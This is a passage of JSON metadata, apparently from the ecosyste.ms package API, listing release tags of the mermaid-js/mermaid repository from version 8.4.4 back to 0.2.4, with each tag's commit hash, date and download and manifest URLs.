aid-js%2Fmermaid/tags/untagged-f43366252632a1a42020","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020/manifests"},{"name":"8.4.4","sha":"0544dbe89196f2709ad714432ed4f6c9883fa023","kind":"commit","published_at":"2019-12-14T08:27:38.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4/manifests"},{"name":"8.4.3","sha":"cb07a729e5e11d58ee1bce43dc041b76a610bde2","kind":"commit","published_at":"2019-11-30T23:42:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3/manifests"},{"name":"8.4.2","sha":"1ecf0f4c234a773c735dc56804233a66377db3b3","kind":"commit","published_at":"2019-11-07T20:16:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2/manifests"},{"name":"8.4.1","sha":"a3017b8456cfafb446aedb9ad549328a69e24984","kind":"commit","published_at":"2019-11-06T18:52:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1/manifests"},{"name":"8.4.0","sha":"0157f665a305b0616e7932360a2f9fb2fa154668","kind":"commit","published_at":"2019-10-19T14:59:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0/manifests"},{"name":"8.3.0","sha":"0200fef389e3b0988557028d6edd03262ceeefba","kind":"commit","published_at":"2019-09-19T05:19:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0/manifests"},{"name":"8.2.6","sha":"2cb54293f80af8c07bee8b91cfb04388e786fb83","kind":"commit","published_at":"2019-09-01T09:18:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6/manifests"},{"name":"8.2.5","sha":"34d3b852271ea3b7ebf58553334ad3d5645c15f1","kind":"commit","published_at":"2019-08-26T18:23:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5/manifests"},{"name":"8.2.4","sha":"a3142aad69167bc6b690e5a77550a869c86d79cd","kind":"commit","published_at":"2019-08-20T18:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4/manifests"},{"name":"8.2.3","sha":"5b85fe9293493bc68d105cf78192ac475c9c6d0e","kind":"commit","published_at":"2019-07-25T19:00:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3/manifests"},{"name":"8.2.2","sha":"cf686c445c069bd3137560f2ab3a30bfb7bc9dc5","kind":"commit","published_at":"2019-07-22T12:23:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2/manifests"},{"name":"8.2.1","sha":"5dd392127f1121dea2a05fb0a535101c085496b2","kind":"commit","published_at":"2019-07-21T09:23:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1/manifests"},{"name":"8.2.0","sha":"92ac7d7c2477071a7279927b023872d866571e28","kind":"commit","published_at":"2019-07-17T16:14:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0/manifests"},{"name":"8.1.0","sha":"95967151ae61be7db104564dbf29db81a4415f11","kind":"commit","published_at":"2019-06-25T08:24:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0/manifests"},{"name":"7.0.5","sha":"f6b5c704e8939db0047e7a70ab3b6109af261fb0","kind":"commit","published_at":"2017-09-01T10:34:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5/manifests"},{"name":"7.0.3","sha":"1076d671374898a1e75b778911832da01f57b88f","kind":"commit","published_at":"2017-06-04T04:13:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3/manifests"},{"name":"7.0.2","sha":"5f5c8a2df00d93d2a9ed48fa868d1a4ded761457","kind":"commit","published_at":"2017-06-01T05:38:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2/manifests"},{"name":"7.0.0","sha":"fb70b9742a22f8673cdd3a8d74fcbbc6ea03b432","kind":"commit","published_at":"2017-01-29T11:14:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0/manifests"},{"name":"6.0.0","sha":"b8d3b01f64f30fa1dd46f7de160e8f80147010f3","kind":"commit","published_at":"2016-05-29T17:25:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/6.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0/manifests"},{"name":"0.5.8","sha":"6ee298dc7d5913ea065b92e736184edcc05b6c74","kind":"commit","published_at":"2016-01-27T14:02:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8/manifests"},{"name":"0.5.7","sha":"f005c72669c0e41bac6f42f81a6805a923dacbf0","kind":"commit","published_at":"2016-01-25T17:59:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7/manifests"},{"name":"0.5.6","sha":"425a83c0da996ba565c2b840993fbf61a725a84a","kind":"commit","published_at":"2015-11-22T17:55:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6/manifests"},{"name":"0.5.5","sha":"c9d29c16e20783700701a340540959ed5680236c","kind":"commit","published_at":"2015-10-21T19:14:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5/manifests"},{"name":"0.5.4","sha":"ecb12ae2a8bc7f8c7077737713cf94acffac5c41","kind":"commit","published_at":"2015-10-19T20:08:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4/manifests"},{"name":"0.5.3","sha":"16906ee242fcaf51d77f082fc3e7167241432ab0","kind":"commit","published_at":"2015-10-04T21:28:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3/manifests"},{"name":"0.5.2","sha":"a611ff3abd70103fc9ac44af63103e9f9d5991c9","kind":"commit","published_at":"2015-10-04T21:09:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2/manifests"},{"name":"0.5.1","sha":"0dc983d04ab9400e604a460eea3a409570961ab2","kind":"commit","published_at":"2015-06-21T15:26:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1/manifests"},{"name":"0.5.0","sha":"999430f9e0c18ca830f497817c8701cfbd2046f9","kind":"commit","published_at":"2015-06-07T15:05:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0/manifests"},{"name":"0.4.0","sha":"cc1a4be15a5ed3726a121a5fce75a561ddca5e1d","kind":"commit","published_at":"2015-03-01T15:48:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0/manifests"},{"name":"0.3.5","sha":"2512666f493e8455f6534f216d42f00a7c9e526f","kind":"commit","published_at":"2015-02-15T18:34:18.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5/manifests"},{"name":"0.3.4","sha":"074a819ca8d3d98cdef3144d091a63f919d3a55d","kind":"commit","published_at":"2015-02-15T17:11:46.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4/manifests"},{"name":"0.3.3","sha":"5452be9feda681abb48d6364fbca662c6af0215d","kind":"commit","published_at":"2015-01-25T15:41:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3/manifests"},{"name":"0.3.2","sha":"911cd09dd875deb50f65a98baf21f65ab2cbf82b","kind":"commit","published_at":"2015-01-11T14:02:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2/manifests"},{"name":"0.3.1","sha":"222a6e06827f194d9368d3a790dbe6cc53341788","kind":"commit","published_at":"2015-01-05T14:32:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1/manifests"},{"name":"0.3.0","sha":"c50178c640a4f6c99539bcc64cf029e94263fdb4","kind":"commit","published_at":"2014-12-22T12:52:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0/manifests"},{"name":"0.2.16","sha":"5712c6de7bdca29a2950df1e6e0342ca8f0323a4","kind":"commit","published_at":"2014-12-15T18:35:09.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.16","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16/manifests"},{"name":"0.2.15","sha":"6988dea3535919faa599537c31c5d94a01a30479","kind":"commit","published_at":"2014-12-05T09:50:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.15","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15/manifests"},{"name":"0.2.14","sha":"dd26960852b4cba1d60e6bb2e508c0af6dd3d4b4","kind":"commit","published_at":"2014-12-03T18:35:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.14","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14/manifests"},{"name":"0.2.13","sha":"fe2f3b403d1310c2a6e09aac24d0fdd257c2ddcf","kind":"commit","published_at":"2014-12-03T18:29:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.13","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13/manifests"},{"name":"0.2.10","sha":"15023461722117d1429bbc0eb6030ca35aa51d53","kind":"commit","published_at":"2014-12-01T20:12:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10/manifests"},{"name":"0.2.9","sha":"1a7997cdef01882ea7b46948d58625e904a09094","kind":"tag","published_at":"2014-12-01T20:04:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9/manifests"},{"name":"0.2.8","sha":"1d2327c4c2ae60692f9bfe8b4d19ea195ebcbb04","kind":"tag","published_at":"2014-12-01T09:01:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8/manifests"},{"name":"0.2.7","sha":"cbd41dbb1b4875aa3254babca694844908a1ecf7","kind":"tag","published_at":"2014-12-01T08:30:27.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7/manifests"},{"name":"0.2.6","sha":"9a35844731426e1f74f64d272ae6398f20424457","kind":"commit","published_at":"2014-11-27T20:28:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6/manifests"},{"name":"0.2.5","sha":"18be0e02aa80dcad171b26d2e397750100dc7d23","kind":"commit","published_at":"2014-11-27T20:16:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5/manifests"},{"name":"0.2.4","sha":"9c31ac8aa68bff142e33b63b5ca3217aa8db7f5a","kind":"commit","published_at":"2014-11-25T21:58:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.4","de